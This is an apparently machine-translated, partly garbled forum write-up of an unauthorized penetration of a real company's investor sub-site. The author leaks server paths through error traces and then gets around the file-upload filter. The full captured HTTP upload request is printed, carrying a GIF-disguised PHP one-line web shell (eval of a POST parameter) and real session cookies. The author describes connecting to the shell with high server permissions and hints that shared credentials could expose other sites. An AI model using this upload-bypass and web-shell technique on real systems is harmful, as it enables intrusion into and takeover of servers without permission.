A penetration test of 36kr

36 KR home page (http://www.36kr.com/), WordPress program, don't get started, so try penetration.

So I saw the investor service there is a sub-site link: http://vc.36tr.com/register an entrepreneurial identity to see what some content.
Entrepreneurs can upload portraits and create products.
 
Habitual action: Upload the Avatar, capture the package, and change the package. However, after several tests, we found that non-image files were uploaded,
"_" Is automatically added to the handler after the name, that is, uploading. php to a file like. _ php is not interpreted...

However, in this process, the image processing error information is exposed as follows:
#0 [2: getimagesize (/var/www/36tree_v2.0/mars/host/http://vc.36tr.com: 80/avatar_image/20120507/11/34/90/n1336371610158.gif): failed to open stream: no such file or directory] tracking call ()
#1 getimagesize call at/var/www/36tree_v2.0/corelib/uploadAvatar. class. php (212)
#2 getWidth call at/var/www/36tree_v2.0/corelib/uploadAvatar. class. php (246)
#3 executeAvatar call at/var/www/36tree_v2.0/corelib/uploadAvatar. class. php (62)
#4 tempSaveUploadPicture call at/var/www/36tree_v2.0/mars/app/vccontroller/signup. class. php (170)
#5 do_ajax_getHtmlSetAvatar call at/var/www/36tree_v2.0/corelib/CAction. class. php (127)
#6 do_method call at/var/www/36tree_v2.0/mars/vchost/index. php (68)
 
This violent path does not make any sense. continue to look at the products created.
 
 

At a glance, I was overjoyed when I saw another place for uploads. ^-^ Www.2cto.com
So I randomly filled in some information to upload the captured packets, changed the file name to php, then submitted it again.
 
POST/product/ajax_importBussinessFile HTTP/1.1
Host: vc.36tr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 6.0) Gecko/20100101 Firefox/6.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-cn, zh; q = 0.5
Connection: keep-alive www.2cto.com
Referer: http://vc.36tr.com/product/new/step3/1429
Cookie: PHPSESSID = tenant; _ utma = tenant; _ utmb = 115084165.43.10.1336371307; _ utmc = 115084165; _ utmz = tenant = bing | utmccn = (organic) | utmcmd = organic | utmctr = ip % 3A220. 181.49.209; vc_session_dd = 4bc060e1ccfa40c8; vc_user_cookie = 56a4496decebcd8961228599a63b0708
Content-Type: multipart/form-data; boundary = --------------------------- 24464570528145
Content-Length: 391
 
----------------------------- 24464570528145
Content-Disposition: form-data; name = "product_id"
 
1429
----------------------------- 24464570528145
Content-Disposition: form-data; name = "bussiness_file []"; filename = "aa. php"
Content-Type: application/vnd. ms-powerpoint
 
GIF89a .............!.......,............
<? Php eval ($ _ POST [guji]);?>
----------------------------- 24464570528145-
 
 
 

 
 
 
The upload is successful. Restore after no file is detected. It's just a pleasure to visit ..
 
 

 
The file has been directly downloaded ????
At that time, I was thinking, is this a php setup to explain the problem? Is the file stored in the database? Is the File Read and output?
I thought, no matter what the above is, there is no way. Alas, give up !!!
But another hand closed, enter: http://img.36tr.com/pdf/
 
 
 
 
 
Fuck, organic. It seems that today's RP outbreak, the server not only lists directories, but also files on it. Haha... Needless to say, the client is connected in one sentence, and the server has a high permission. Many websites are here with some important information. The main site does not seem to be on this server, so I will not continue. I deleted the trojan file.
 
However, after information mining and analysis, it is found that the use of the same account and password for management in various regions may allow other websites, including the main site, to access the website.

 
Solution:

Pay attention to substation security. Others should understand.

Author: Jannock